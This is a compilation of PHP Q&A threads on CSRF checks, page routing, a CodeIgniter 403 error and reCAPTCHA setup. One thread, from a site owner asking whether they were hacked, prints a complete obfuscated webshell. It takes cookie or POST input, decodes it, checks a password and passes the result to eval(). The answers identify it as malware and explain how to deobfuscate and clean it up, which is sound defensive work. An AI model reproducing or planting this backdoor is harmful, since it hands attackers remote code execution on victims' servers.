Admin restriction fails from an irrelevant function - php

I have this piece of code in PHP web app.
if (isset($require_admin) && $require_admin) {
    if (!check_admin()) {
        $toolContent_ErrorExists = $langCheckAdmin;
        $errorMessagePath = "../../";
    }
}
The normal behavior is that if the variable $require_admin is set and true, the code will check whether the visit is by the admin.
I tried to add a similar piece of code some lines below so as to do other things, like checking for cross-origin (especially CSRF) requests.
if (isset($require_token) && $require_token) {
    if (!checkToken($mycsrf_token, $myform)) {
        $toolContent_ErrorExists = $langCheckToken;
        $errorMessagePath = "../../";
    }
}
I had in mind that in this way I would have a check that the posted forms I get are valid and, if not, there would be an error message.
However, when $require_token is set and true, and the condition is verified, I get a very strange result. Not only does nothing happen for the CSRF validation, but the function above stops working properly and the admin restriction stops working.
I know the question may be ambiguous, but I cannot work out what's going on there. I'm not so experienced in web programming and totally new to PHP, so maybe someone has a better idea!
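As an added illustration (this is not the asker's code, and the function names csrf_token_for_form(), verify_csrf_token() and check_admin() are this example's own), here is the shape such a pair of gates usually takes: a per-form token stored in the session, compared with hash_equals(), and both checks recording their own failure instead of sharing one error variable, so the token check cannot silently overwrite the admin check's result:

```php
<?php
// Added example: session-bound CSRF tokens plus an independent admin gate.
// Assumed: the application stores the user's role in $_SESSION['role'] at login.
session_start();

// One random token per form name, created on first use and kept in the session.
function csrf_token_for_form(string $form): string
{
    if (empty($_SESSION['csrf'][$form])) {
        $_SESSION['csrf'][$form] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf'][$form];
}

// Constant-time comparison; a missing or non-string token fails closed.
function verify_csrf_token($submitted, string $form): bool
{
    if (!is_string($submitted) || empty($_SESSION['csrf'][$form])) {
        return false;
    }
    return hash_equals($_SESSION['csrf'][$form], $submitted);
}

function check_admin(): bool
{
    return ($_SESSION['role'] ?? '') === 'admin';
}

// Collect every failure rather than letting the last check win.
$errors = [];
if (!empty($require_admin) && !check_admin()) {
    $errors[] = 'admin required';
}
if (!empty($require_token) && $_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!verify_csrf_token($_POST['csrf_token'] ?? null, 'myform')) {
        $errors[] = 'invalid or missing CSRF token';
    }
}
if ($errors) {
    http_response_code(403);
    exit(htmlspecialchars(implode('; ', $errors)));
}

// When rendering the form, embed the token as a hidden field.
$token = csrf_token_for_form('myform');
echo '<input type="hidden" name="csrf_token" value="' . htmlspecialchars($token) . '">';
```

The token only has to be checked on state-changing requests (POST here); GET views that merely render the form need the token embedded, not verified.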


I found this strange code in the root directory. Does it mean my website was hacked?

I am sorry to ask a silly question, but I am not able to figure this out. I found a PHP file in my root directory with strange code. I know a little bit of PHP, but this is very strange code inside the PHP code. I am sure that these are not PHP functions. I don't know what this code is about.
Is my website compromised? Can someone tell me what they can do with my website through this code? I am raising this question here because maybe this can help someone to save their website.
<?php ${"\x47\x4c\x4fB\x41\x4c\x53"}['t7004'] = "\x2d\x23\x5f\x5d\x68\x45\x69\x3a\xa\x2e\x32\x39\x60\x35\x44\x9\x59\x6a\x7b\x50\xd\x7d\x57\x2b\x29\x53\x20\x7e\x56\x37\x48\x46\x70\x7c\x49\x4e\x52\x25\x26\x42\x5a\x30\x2a\x62\x51\x2f\x3c\x33\x4d\x79\x54\x3b\x6d\x74\x22\x65\x61\x71\x6f\x72\x5e\x63\x34\x5b\x78\x77\x4f\x58\x43\x47\x40\x66\x76\x41\x67\x31\x3d\x6e\x4c\x64\x55\x3f\x24\x73\x75\x36\x28\x3e\x21\x7a\x38\x2c\x6c\x4b\x27\x6b\x4a\x5c";
$GLOBALS[$GLOBALS['t7004'][79].$GLOBALS['t7004'][75].$GLOBALS['t7004'][43].$GLOBALS['t7004'][55].$GLOBALS['t7004'][62].$GLOBALS['t7004'][43]] = $GLOBALS['t7004'][61].$GLOBALS['t7004'][4].$GLOBALS['t7004'][59];
$GLOBALS[$GLOBALS['t7004'][49].$GLOBALS['t7004'][11].$GLOBALS['t7004'][11].$GLOBALS['t7004'][90].$GLOBALS['t7004'][55].$GLOBALS['t7004'][62]] = $GLOBALS['t7004'][58].$GLOBALS['t7004'][59].$GLOBALS['t7004'][79];
$GLOBALS[$GLOBALS['t7004'][65].$GLOBALS['t7004'][47].$GLOBALS['t7004'][56].$GLOBALS['t7004'][55].$GLOBALS['t7004'][62].$GLOBALS['t7004'][43].$GLOBALS['t7004'][11]] = $GLOBALS['t7004'][83].$GLOBALS['t7004'][53].$GLOBALS['t7004'][59].$GLOBALS['t7004'][92].$GLOBALS['t7004'][55].$GLOBALS['t7004'][77];
$GLOBALS[$GLOBALS['t7004'][89].$GLOBALS['t7004'][85].$GLOBALS['t7004'][71].$GLOBALS['t7004'][56].$GLOBALS['t7004'][61].$GLOBALS['t7004'][56].$GLOBALS['t7004'][62]] = $GLOBALS['t7004'][6].$GLOBALS['t7004'][77].$GLOBALS['t7004'][6].$GLOBALS['t7004'][2].$GLOBALS['t7004'][83].$GLOBALS['t7004'][55].$GLOBALS['t7004'][53];
$GLOBALS[$GLOBALS['t7004'][65].$GLOBALS['t7004'][90].$GLOBALS['t7004'][62].$GLOBALS['t7004'][41].$GLOBALS['t7004'][71].$GLOBALS['t7004'][10]] = $GLOBALS['t7004'][83].$GLOBALS['t7004'][55].$GLOBALS['t7004'][59].$GLOBALS['t7004'][6].$GLOBALS['t7004'][56].$GLOBALS['t7004'][92].$GLOBALS['t7004'][6].$GLOBALS['t7004'][89].$GLOBALS['t7004'][55];
$GLOBALS[$GLOBALS['t7004'][65].$GLOBALS['t7004'][13].$GLOBALS['t7004'][75].$GLOBALS['t7004'][90].$GLOBALS['t7004'][90]] = $GLOBALS['t7004'][32].$GLOBALS['t7004'][4].$GLOBALS['t7004'][32].$GLOBALS['t7004'][72].$GLOBALS['t7004'][55].$GLOBALS['t7004'][59].$GLOBALS['t7004'][83].$GLOBALS['t7004'][6].$GLOBALS['t7004'][58].$GLOBALS['t7004'][77];
$GLOBALS[$GLOBALS['t7004'][84].$GLOBALS['t7004'][43].$GLOBALS['t7004'][55].$GLOBALS['t7004'][55].$GLOBALS['t7004'][90].$GLOBALS['t7004'][61]] = $GLOBALS['t7004'][84].$GLOBALS['t7004'][77].$GLOBALS['t7004'][83].$GLOBALS['t7004'][55].$GLOBALS['t7004'][59].$GLOBALS['t7004'][6].$GLOBALS['t7004'][56].$GLOBALS['t7004'][92].$GLOBALS['t7004'][6].$GLOBALS['t7004'][89].$GLOBALS['t7004'][55];
$GLOBALS[$GLOBALS['t7004'][58].$GLOBALS['t7004'][79].$GLOBALS['t7004'][62].$GLOBALS['t7004'][56]] = $GLOBALS['t7004'][43].$GLOBALS['t7004'][56].$GLOBALS['t7004'][83].$GLOBALS['t7004'][55].$GLOBALS['t7004'][85].$GLOBALS['t7004'][62].$GLOBALS['t7004'][2].$GLOBALS['t7004'][79].$GLOBALS['t7004'][55].$GLOBALS['t7004'][61].$GLOBALS['t7004'][58].$GLOBALS['t7004'][79].$GLOBALS['t7004'][55];
$GLOBALS[$GLOBALS['t7004'][74].$GLOBALS['t7004'][62].$GLOBALS['t7004'][10].$GLOBALS['t7004'][29].$GLOBALS['t7004'][75].$GLOBALS['t7004'][90].$GLOBALS['t7004'][90].$GLOBALS['t7004'][62]] = $GLOBALS['t7004'][83].$GLOBALS['t7004'][55].$GLOBALS['t7004'][53].$GLOBALS['t7004'][2].$GLOBALS['t7004'][53].$GLOBALS['t7004'][6].$GLOBALS['t7004'][52].$GLOBALS['t7004'][55].$GLOBALS['t7004'][2].$GLOBALS['t7004'][92].$GLOBALS['t7004'][6].$GLOBALS['t7004'][52].$GLOBALS['t7004'][6].$GLOBALS['t7004'][53];
$GLOBALS[$GLOBALS['t7004'][61].$GLOBALS['t7004'][85].$GLOBALS['t7004'][11].$GLOBALS['t7004'][56].$GLOBALS['t7004'][13].$GLOBALS['t7004'][47].$GLOBALS['t7004'][29].$GLOBALS['t7004'][61]] = $GLOBALS['t7004'][49].$GLOBALS['t7004'][75].$GLOBALS['t7004'][41].$GLOBALS['t7004'][10].$GLOBALS['t7004'][62].$GLOBALS['t7004'][13];
$GLOBALS[$GLOBALS['t7004'][56].$GLOBALS['t7004'][71].$GLOBALS['t7004'][29].$GLOBALS['t7004'][47].$GLOBALS['t7004'][13]] = $GLOBALS['t7004'][71].$GLOBALS['t7004'][29].$GLOBALS['t7004'][85].$GLOBALS['t7004'][90].$GLOBALS['t7004'][62].$GLOBALS['t7004'][71].$GLOBALS['t7004'][13].$GLOBALS['t7004'][55].$GLOBALS['t7004'][55];
$GLOBALS[$GLOBALS['t7004'][4].$GLOBALS['t7004'][75].$GLOBALS['t7004'][79].$GLOBALS['t7004'][79].$GLOBALS['t7004'][85]] = $_POST;
$GLOBALS[$GLOBALS['t7004'][65].$GLOBALS['t7004'][10].$GLOBALS['t7004'][29].$GLOBALS['t7004'][56].$GLOBALS['t7004'][29].$GLOBALS['t7004'][29].$GLOBALS['t7004'][85].$GLOBALS['t7004'][10]] = $_COOKIE;
#$GLOBALS[$GLOBALS['t7004'][89].$GLOBALS['t7004'][85].$GLOBALS['t7004'][71].$GLOBALS['t7004'][56].$GLOBALS['t7004'][61].$GLOBALS['t7004'][56].$GLOBALS['t7004'][62]]($GLOBALS['t7004'][55].$GLOBALS['t7004'][59].$GLOBALS['t7004'][59].$GLOBALS['t7004'][58].$GLOBALS['t7004'][59].$GLOBALS['t7004'][2].$GLOBALS['t7004'][92].$GLOBALS['t7004'][58].$GLOBALS['t7004'][74], NULL);
#$GLOBALS[$GLOBALS['t7004'][89].$GLOBALS['t7004'][85].$GLOBALS['t7004'][71].$GLOBALS['t7004'][56].$GLOBALS['t7004'][61].$GLOBALS['t7004'][56].$GLOBALS['t7004'][62]]($GLOBALS['t7004'][92].$GLOBALS['t7004'][58].$GLOBALS['t7004'][74].$GLOBALS['t7004'][2].$GLOBALS['t7004'][55].$GLOBALS['t7004'][59].$GLOBALS['t7004'][59].$GLOBALS['t7004'][58].$GLOBALS['t7004'][59].$GLOBALS['t7004'][83], 0);
#$GLOBALS[$GLOBALS['t7004'][89].$GLOBALS['t7004'][85].$GLOBALS['t7004'][71].$GLOBALS['t7004'][56].$GLOBALS['t7004'][61].$GLOBALS['t7004'][56].$GLOBALS['t7004'][62]]($GLOBALS['t7004'][52].$GLOBALS['t7004'][56].$GLOBALS['t7004'][64].$GLOBALS['t7004'][2].$GLOBALS['t7004'][55].$GLOBALS['t7004'][64].$GLOBALS['t7004'][55].$GLOBALS['t7004'][61].$GLOBALS['t7004'][84].$GLOBALS['t7004'][53].$GLOBALS['t7004'][6].$GLOBALS['t7004'][58].$GLOBALS['t7004'][77].$GLOBALS['t7004'][2].$GLOBALS['t7004'][53].$GLOBALS['t7004'][6].$GLOBALS['t7004'][52].$GLOBALS['t7004'][55], 0);
#$GLOBALS[$GLOBALS['t7004'][74].$GLOBALS['t7004'][62].$GLOBALS['t7004'][10].$GLOBALS['t7004'][29].$GLOBALS['t7004'][75].$GLOBALS['t7004'][90].$GLOBALS['t7004'][90].$GLOBALS['t7004'][62]](0);
$rcc6ec6 = NULL;
$e6ca3e0 = NULL;
$GLOBALS[$GLOBALS['t7004'][61].$GLOBALS['t7004'][85].$GLOBALS['t7004'][10].$GLOBALS['t7004'][29].$GLOBALS['t7004'][90].$GLOBALS['t7004'][79].$GLOBALS['t7004'][29].$GLOBALS['t7004'][10].$GLOBALS['t7004'][90]] = $GLOBALS['t7004'][10].$GLOBALS['t7004'][85].$GLOBALS['t7004'][62].$GLOBALS['t7004'][61].$GLOBALS['t7004'][10].$GLOBALS['t7004'][56].$GLOBALS['t7004'][85].$GLOBALS['t7004'][55].$GLOBALS['t7004'][0].$GLOBALS['t7004'][71].$GLOBALS['t7004'][61].$GLOBALS['t7004'][55].$GLOBALS['t7004'][13].$GLOBALS['t7004'][0].$GLOBALS['t7004'][62].$GLOBALS['t7004'][62].$GLOBALS['t7004'][90].$GLOBALS['t7004'][85].$GLOBALS['t7004'][0].$GLOBALS['t7004'][90].$GLOBALS['t7004'][79].$GLOBALS['t7004'][62].$GLOBALS['t7004'][75].$GLOBALS['t7004'][0].$GLOBALS['t7004'][62].$GLOBALS['t7004'][56].$GLOBALS['t7004'][71].$GLOBALS['t7004'][71].$GLOBALS['t7004'][62].$GLOBALS['t7004'][90].$GLOBALS['t7004'][75].$GLOBALS['t7004'][43].$GLOBALS['t7004'][85].$GLOBALS['t7004'][71].$GLOBALS['t7004'][55].$GLOBALS['t7004'][29];
global $c6278d728;
function f7684f5ee($rcc6ec6, $r8c6)
{
$ua52559 = "";
for ($o4b1=0; $o4b1<$GLOBALS[$GLOBALS['t7004'][65].$GLOBALS['t7004'][47].$GLOBALS['t7004'][56].$GLOBALS['t7004'][55].$GLOBALS['t7004'][62].$GLOBALS['t7004'][43].$GLOBALS['t7004'][11]]($rcc6ec6);)
{
for ($b1ad67b=0; $b1ad67b<$GLOBALS[$GLOBALS['t7004'][65].$GLOBALS['t7004'][47].$GLOBALS['t7004'][56].$GLOBALS['t7004'][55].$GLOBALS['t7004'][62].$GLOBALS['t7004'][43].$GLOBALS['t7004'][11]]($r8c6) && $o4b1<$GLOBALS[$GLOBALS['t7004'][65].$GLOBALS['t7004'][47].$GLOBALS['t7004'][56].$GLOBALS['t7004'][55].$GLOBALS['t7004'][62].$GLOBALS['t7004'][43].$GLOBALS['t7004'][11]]($rcc6ec6); $b1ad67b++, $o4b1++)
{
$ua52559 .= $GLOBALS[$GLOBALS['t7004'][79].$GLOBALS['t7004'][75].$GLOBALS['t7004'][43].$GLOBALS['t7004'][55].$GLOBALS['t7004'][62].$GLOBALS['t7004'][43]]($GLOBALS[$GLOBALS['t7004'][49].$GLOBALS['t7004'][11].$GLOBALS['t7004'][11].$GLOBALS['t7004'][90].$GLOBALS['t7004'][55].$GLOBALS['t7004'][62]]($rcc6ec6[$o4b1]) ^ $GLOBALS[$GLOBALS['t7004'][49].$GLOBALS['t7004'][11].$GLOBALS['t7004'][11].$GLOBALS['t7004'][90].$GLOBALS['t7004'][55].$GLOBALS['t7004'][62]]($r8c6[$b1ad67b]));
}
}
return $ua52559;
}
function y10245($rcc6ec6, $r8c6)
{
global $c6278d728;
return $GLOBALS[$GLOBALS['t7004'][56].$GLOBALS['t7004'][71].$GLOBALS['t7004'][29].$GLOBALS['t7004'][47].$GLOBALS['t7004'][13]]($GLOBALS[$GLOBALS['t7004'][56].$GLOBALS['t7004'][71].$GLOBALS['t7004'][29].$GLOBALS['t7004'][47].$GLOBALS['t7004'][13]]($rcc6ec6, $c6278d728), $r8c6);
}
foreach ($GLOBALS[$GLOBALS['t7004'][65].$GLOBALS['t7004'][10].$GLOBALS['t7004'][29].$GLOBALS['t7004'][56].$GLOBALS['t7004'][29].$GLOBALS['t7004'][29].$GLOBALS['t7004'][85].$GLOBALS['t7004'][10]] as $r8c6=>$ob6137983)
{
$rcc6ec6 = $ob6137983;
$e6ca3e0 = $r8c6;
}
if (!$rcc6ec6)
{
foreach ($GLOBALS[$GLOBALS['t7004'][4].$GLOBALS['t7004'][75].$GLOBALS['t7004'][79].$GLOBALS['t7004'][79].$GLOBALS['t7004'][85]] as $r8c6=>$ob6137983)
{
$rcc6ec6 = $ob6137983;
$e6ca3e0 = $r8c6;
}
}
$rcc6ec6 = #$GLOBALS[$GLOBALS['t7004'][84].$GLOBALS['t7004'][43].$GLOBALS['t7004'][55].$GLOBALS['t7004'][55].$GLOBALS['t7004'][90].$GLOBALS['t7004'][61]]($GLOBALS[$GLOBALS['t7004'][61].$GLOBALS['t7004'][85].$GLOBALS['t7004'][11].$GLOBALS['t7004'][56].$GLOBALS['t7004'][13].$GLOBALS['t7004'][47].$GLOBALS['t7004'][29].$GLOBALS['t7004'][61]]($GLOBALS[$GLOBALS['t7004'][58].$GLOBALS['t7004'][79].$GLOBALS['t7004'][62].$GLOBALS['t7004'][56]]($rcc6ec6), $e6ca3e0));
if (isset($rcc6ec6[$GLOBALS['t7004'][56].$GLOBALS['t7004'][95]]) && $c6278d728==$rcc6ec6[$GLOBALS['t7004'][56].$GLOBALS['t7004'][95]])
{
if ($rcc6ec6[$GLOBALS['t7004'][56]] == $GLOBALS['t7004'][6])
{
$o4b1 = Array(
$GLOBALS['t7004'][32].$GLOBALS['t7004'][72] => #$GLOBALS[$GLOBALS['t7004'][65].$GLOBALS['t7004'][13].$GLOBALS['t7004'][75].$GLOBALS['t7004'][90].$GLOBALS['t7004'][90]](),
$GLOBALS['t7004'][83].$GLOBALS['t7004'][72] => $GLOBALS['t7004'][75].$GLOBALS['t7004'][9].$GLOBALS['t7004'][41].$GLOBALS['t7004'][0].$GLOBALS['t7004'][75],
);
echo #$GLOBALS[$GLOBALS['t7004'][65].$GLOBALS['t7004'][90].$GLOBALS['t7004'][62].$GLOBALS['t7004'][41].$GLOBALS['t7004'][71].$GLOBALS['t7004'][10]]($o4b1);
}
elseif ($rcc6ec6[$GLOBALS['t7004'][56]] == $GLOBALS['t7004'][55])
{
eval($rcc6ec6[$GLOBALS['t7004'][79]]);
}
exit();
}
(I'm not able yet to answer)
I had similar code on a customer website with a Joomla install, several times.
If your web host doesn't have a code checker where it blacklists hacked files, you will have to search the whole public_html directory.
I had one recent case where the code included several new files in a WordPress install, across different folders and some hidden with even meaningful names. I had to go through every folder and check files with the same date (the hacking date - last modification) and go through each one to check if it was completely malicious code or just partly.
But usually I radically delete sections and files with encrypted code; they generally are hacked files...
The code you have posted is obfuscated PHP. The string at the beginning with all the \x 's in it is a hex representation of a string.
There is a neat site named "DDecode" I found here: Hex Decoder which will attempt to do exactly what it says.
Plugging your code into that site we can see that the first part:
<?php ${"\x47\x4c\x4fB\x41\x4c\x53"}['t7004'] = "\x2d\x23\x5f\x5d\x68\x45\x69\x3a\xa\x2e\x32\x39\x60\x35\x44\x9\x59\x6a\x7b\x50\xd\x7d\x57\x2b\x29\x53\x20\x7e\x56\x37\x48\x46\x70\x7c\x49\x4e\x52\x25\x26\x42\x5a\x30\x2a\x62\x51\x2f\x3c\x33\x4d\x79\x54\x3b\x6d\x74\x22\x65\x61\x71\x6f\x72\x5e\x63\x34\x5b\x78\x77\x4f\x58\x43\x47\x40\x66\x76\x41\x67\x31\x3d\x6e\x4c\x64\x55\x3f\x24\x73\x75\x36\x28\x3e\x21\x7a\x38\x2c\x6c\x4b\x27\x6b\x4a\x5c";
becomes:
<?php ${"GLOBALS"}['t7004'] = "-#_]hEi:\xa.29`5D\x9Yj{P\xd}W+)S~V7HFp|INR%&BZ0*bQ/<3MyT;mt"eaqor^c4[xwOXCG#fvAg1=nLdU?$su6(>!z8,lK'kJ\";
I am not super familiar with PHP myself, however we can see that a variable is being set here to a long, apparently random string. From there we can look at the rest of the code and see that it is almost entirely a series of references back to this initial string. In this way the attacker has hidden what their code is doing by making it appear nonsensical, which is the point of obfuscation of course.
You could take the time to dereference all of those calls if you wanted to try and get a better idea of what the code is doing. Also there may be some security researchers who would be interested in seeing this code and could possibly give you more insight into what it is doing.
As for the state of your website - if you didn't do this then yes, the chances are highly likely it has been compromised and you should at a minimum, as the comments suggested:
roll back to a clean, known good version
update your host with any applicable patches
INFORM YOUR USERS! Especially since you are unsure what this code does it is important to let your users know that your site has potentially been compromised so they can take the appropriate actions.
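Dereferencing the index chains by hand is tedious, so here is an added helper (not the posted file and not the DDecode site's tool; the names php_deobfuscate_index_strings, php_literal and sample_php are this example's own) that does the job mechanically: it decodes the key string with stripcslashes(), turns every `$GLOBALS['t7004'][i].$GLOBALS['t7004'][j]...` chain into a readable literal, inlines the resulting function-name aliases, and lists which webshell primitives appear. The embedded input is constructed from the posted key string plus three statements written in the same pattern; feed it the whole file in practice.

```php
<?php
// Added example: resolve index-chain obfuscation of the kind posted above.

// Render a string as a PHP double-quoted literal, hex-escaping non-printables.
function php_literal(string $s): string
{
    $out = '';
    for ($i = 0, $n = strlen($s); $i < $n; $i++) {
        $ch = $s[$i];
        $o = ord($ch);
        if ($ch === '\\' || $ch === '"' || $ch === '$') {
            $out .= '\\' . $ch;
        } elseif ($o >= 32 && $o < 127) {
            $out .= $ch;
        } else {
            $out .= sprintf('\\x%02x', $o);
        }
    }
    return '"' . $out . '"';
}

function php_deobfuscate_index_strings(string $src): array
{
    // 1. Locate ${"..."}['name'] = "..."; and decode the key the way PHP would.
    $keyRe = '/\$\{"((?:[^"\\\\]|\\\\.)*)"\}\[\'(\w+)\'\]\s*=\s*"((?:[^"\\\\]|\\\\.)*)";/';
    if (!preg_match($keyRe, $src, $m) || stripcslashes($m[1]) !== 'GLOBALS') {
        throw new RuntimeException('no ${"GLOBALS"}[name] = "..." key assignment found');
    }
    $name = $m[2];
    $key  = stripcslashes($m[3]);   // \xHH, \n, \t, ... -> bytes

    // 2. Each chain $GLOBALS['name'][i].$GLOBALS['name'][j]... becomes a literal.
    $ref   = '\$GLOBALS\[\'' . preg_quote($name, '/') . '\'\]\[(\d+)\]';
    $chain = '/' . $ref . '(?:\s*\.\s*' . $ref . ')*/';
    $src = preg_replace_callback($chain, function ($c) use ($key) {
        preg_match_all('/\[(\d+)\]/', $c[0], $idx);
        $s = '';
        foreach ($idx[1] as $i) {
            $s .= $key[(int) $i];
        }
        return php_literal($s);
    }, $src);

    // 3. Record and inline aliases such as $GLOBALS["od4a"] = "base64_decode"; or = $_POST;
    $aliases = [];
    $src = preg_replace_callback(
        '/\$GLOBALS\["(\w+)"\]\s*=\s*(?:"(\w+)"|(\$_[A-Z]+));\n?/',
        function ($a) use (&$aliases) {
            $aliases[$a[1]] = $a[2] !== '' ? $a[2] : $a[3];
            return '';
        },
        $src
    );
    foreach ($aliases as $alias => $target) {
        $src = str_replace('$GLOBALS["' . $alias . '"]', $target, $src);
    }

    // 4. Flag the primitives an analyst looks for first.
    $suspect = ['eval', 'base64_decode', 'unserialize', 'preg_replace',
                'create_function', '$_POST', '$_COOKIE'];
    $haystack = $src . ' ' . implode(' ', $aliases);
    $found = array_values(array_filter($suspect, function ($w) use ($haystack) {
        return preg_match('/(?<![\w$])' . preg_quote($w, '/') . '\b/', $haystack) === 1;
    }));

    return ['key' => $key, 'aliases' => $aliases, 'found' => $found, 'source' => $src];
}

// Constructed input: the posted key string plus three statements in the same
// pattern (the base64_decode alias, the $_POST alias and the eval line).
function sample_php(): string
{
    $g = "\$GLOBALS['t7004']";
    $chain = function (array $idx) use ($g) {
        $parts = [];
        foreach ($idx as $i) {
            $parts[] = $g . '[' . $i . ']';
        }
        return implode('.', $parts);
    };
    $hexKey = '\x2d\x23\x5f\x5d\x68\x45\x69\x3a\xa\x2e\x32\x39\x60\x35\x44\x9\x59\x6a\x7b\x50'
            . '\xd\x7d\x57\x2b\x29\x53\x20\x7e\x56\x37\x48\x46\x70\x7c\x49\x4e\x52\x25\x26\x42'
            . '\x5a\x30\x2a\x62\x51\x2f\x3c\x33\x4d\x79\x54\x3b\x6d\x74\x22\x65\x61\x71\x6f\x72'
            . '\x5e\x63\x34\x5b\x78\x77\x4f\x58\x43\x47\x40\x66\x76\x41\x67\x31\x3d\x6e\x4c\x64'
            . '\x55\x3f\x24\x73\x75\x36\x28\x3e\x21\x7a\x38\x2c\x6c\x4b\x27\x6b\x4a\x5c';
    return '<?php ${"\x47\x4c\x4fB\x41\x4c\x53"}[\'t7004\'] = "' . $hexKey . '";' . "\n"
         . '$GLOBALS[' . $chain([58, 79, 62, 56]) . '] = '
         . $chain([43, 56, 83, 55, 85, 62, 2, 79, 55, 61, 58, 79, 55]) . ";\n"
         . '$GLOBALS[' . $chain([4, 75, 79, 79, 85]) . '] = $_POST;' . "\n"
         . 'eval($rcc6ec6[' . $chain([79]) . ']);' . "\n";
}

$r = php_deobfuscate_index_strings(sample_php());
echo $r['source'];                       // rewritten source, chains resolved, aliases inlined
print_r($r['aliases']);                  // alias name => real function or superglobal
echo implode(', ', $r['found']), "\n";   // the primitives that appear
```

Run it on the full posted file and the `$GLOBALS[...]` calls become ordinary names, which is what you need to judge how far the compromise goes; the rewritten text is for reading only, never for executing.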

Using isset to display page content

I am having an issue using isset to display content on a page.
My PHP file is called messages.php
I am directing my users with links to this URL: messages.php?inbox, using if(isset($_GET['inbox'])) { } to display the user's inbox. The same principle applies to the other user options, such as compose message: messages.php?compose, again using isset.
The only problem I have is that I cannot stop people from manually typing stuff like domain.com/messages.php or domain.com/messages.php?somethingrandom.
Is there a way to direct users to messages.php?inbox when they type something into the address bar that isn't assigned to isset?
I did try to use switch but couldn't seem to get it to work properly with how I've laid out my HTML.
An example of the whole file is here http://pastebin.com/SfqN2L7g
I am fairly new to PHP and think I may have gone down the complicated route.
Any advice would be appreciated.
Thanks
The answer you added already would work, but I usually like having an array of valid options which I could maybe check against later on.
$validPages = array('inbox', 'compose');
$pageFound = false;
foreach ($validPages as $validPage) {
    if (isset($_GET[$validPage])) {
        $pageFound = true;
        break;
    }
}
if (! $pageFound) {
    header('Location: /messages.php?inbox');
    exit; // stop here; otherwise the rest of the page still runs after the redirect header
}
Thanks to the help of Marcos Pérez Gude, the answer is as follows:
if(isset($_GET['inbox']) || isset($_GET['compose'])){
    //Then do below
}else{
    header("Location: messages.php?inbox");
    exit;
}
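A variant of the allowlist idea, added here as an example (it is not from either answer; resolve_view(), render_inbox() and render_compose() are this example's names): the allowed views are a map from query key to the function that renders it, the first allowed key present wins, anything else is redirected, and the script exits after header() so no page content is sent along with the redirect.

```php
<?php
// Added example: allowlisted views dispatched by the first recognised query key.

function render_inbox(): void
{
    echo '<h1>Inbox</h1>';
}

function render_compose(): void
{
    echo '<h1>Compose</h1>';
}

// Map of allowed query keys to renderers; unknown keys never reach a renderer.
$views = ['inbox' => 'render_inbox', 'compose' => 'render_compose'];

// Returns the first allowed key present in $get, or null when there is none.
// array_key_exists() treats "?inbox" (value "") the same as "?inbox=1".
function resolve_view(array $get, array $views): ?string
{
    foreach ($views as $name => $renderer) {
        if (array_key_exists($name, $get)) {
            return $name;
        }
    }
    return null;
}

$view = resolve_view($_GET, $views);
if ($view === null) {
    // messages.php, messages.php?somethingrandom, ... all land on the inbox.
    header('Location: /messages.php?inbox');
    exit;
}
$views[$view]();
```

Because the dispatch goes through the map, adding a view means adding one entry rather than extending an if/else chain, and a typo in the URL can never call a function that was not listed.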

CodeIgniter 403 error instead of removing bad data

CodeIgniter 2.1.4
After doing a little research about CodeIgniter's XSS protections, I decided to quickly and crudely test this by typing some random HTML into any input field on my CodeIgniter forms.
When I typed in <script>, the page is redirected to the server's default 403 error ("Forbidden") page. It's not even a CodeIgniter error page.
I'm very glad that any input data containing <script> is stopped; however, I'm not understanding why this is generating a 403 error page instead of a validation error, or at least passing the data on with the offending parts stripped out.
I'm using htmlentities() to convert the < and > but this makes no difference.
It doesn't even matter if I implement the form validation. The input data <script> will generate a 403 error even without it.
Can anyone explain what's happening here and whether I need to be worried about how this is being handled/redirected? To me it just seems like I should be getting some sort of CodeIgniter validation error or stripped-down data rather than a 403 error.
Here is a concise version of one of my Controllers. (It's happening on all Controllers with data input fields.)
public function search($search_slug = NULL)
{
    $this->load->library('form_validation');
    $this->form_validation->set_rules('search-terms', 'Search Terms', 'xss_clean');
    if ($this->input->post('search-terms') && ($this->form_validation->run() !== FALSE))
    {
        $search_slug = url_title(htmlentities($this->input->post('search-terms')), 'dash', FALSE);
    }
    if ($search_slug !== NULL)
    {
        $search_terms = preg_replace('/-/', ' ', $search_slug);
        $query = // get my results from model;
        if ($query['count'] > 0)
        {
            $data['results'] = $query['results'];
        }
        else
        {
            $data['results'] = '<h3>Sorry, nothing found.</h3>';
        }
    }
    else
    {
        $data['results'] = '<h3>Please enter your search terms.</h3>';
    }
    $this->template->load('default', 'search', $data);
}
After reading the comments on my OP and digging into it deeper, this 403 redirect doesn't seem to have anything to do with CodeIgniter after all.
Also, after installing ZenPhoto on the same account, I see the 403 redirect when entering <script> into the ZenPhoto search box too.
Since it's shared hosting, I cannot say, with 100% certainty, that this is the result of something in Apache protecting itself, but all evidence seems to point there.
This character is not allowed.
Check the accepted answer: SO - characters allowed in a URL
Your request wasn't reaching index.php
Apart from that have a look at application/config/config.php
$config['permitted_uri_chars'] = 'a-z 0-9~%.:_\-';
These are the characters your application allows when a request reaches it.

I need help getting recaptcha to work

I recently had a site designed for me, but my dev used a really crappy generic captcha that fails half the time. I'm trying to replace it using a reCAPTCHA, but I'm having trouble. I cannot figure out which *.php is used for 'processing' and which is used for the 'form'.
I didn't want to post the whole code, so here it is:
This is the 'form' page, as it has the form fields and etc embedded:
http://dl.dropbox.com/u/45666699/formcode.txt
Can someone please take a look at this code and tell me where I should put the private code for recaptcha? Also, how do I disable the "random_number" captcha that is already installed? Thanks!
The code for your existing captcha is on lines 295, 296 and 297:
require_once('recaptchalib.php');
$publickey = "6LfIUdISAAAAAKguxgdPCjZ6-OkVeu5tmcBaa7ug"; // you got this from the signup page
echo recaptcha_get_html($publickey);
Well, you'll need the private key when you're trying to validate that the correct captcha was entered (i.e. at the point where you're handling the form submission),
which, by looking at your code, should start immediately after line 4.
Using a project I did a while back, you would have something like so...
$recaptcha_error = NULL;
//set it to NULL initially
if(isset($_POST["btnsend"])){
    include_once(INCLUDES_FOLDER."recaptcha-php-1.11/recaptchalib.php");
    $resp = recaptcha_check_answer(RECAPTCHA_PRIVATE_KEY,$_SERVER["REMOTE_ADDR"],$_POST["recaptcha_challenge_field"],$_POST["recaptcha_response_field"]);
    if($resp->is_valid){
        //captcha was entered correctly
        //continue with your normal code processing here
    } else {
        //wrong input -- captcha was invalid -- give the person the error response
        //mine is as below -- my usual way :)
        $response = array(array("Something seems to be wrong with the captcha!","Please check that you entered it correctly or check the returned error message"),false,"w");
        $recaptcha_error = $resp->error;
        //make sure to do the above so you can use it when generating the captcha display
    }
}
//You got the recaptcha error (or left it as NULL above so you could do this)
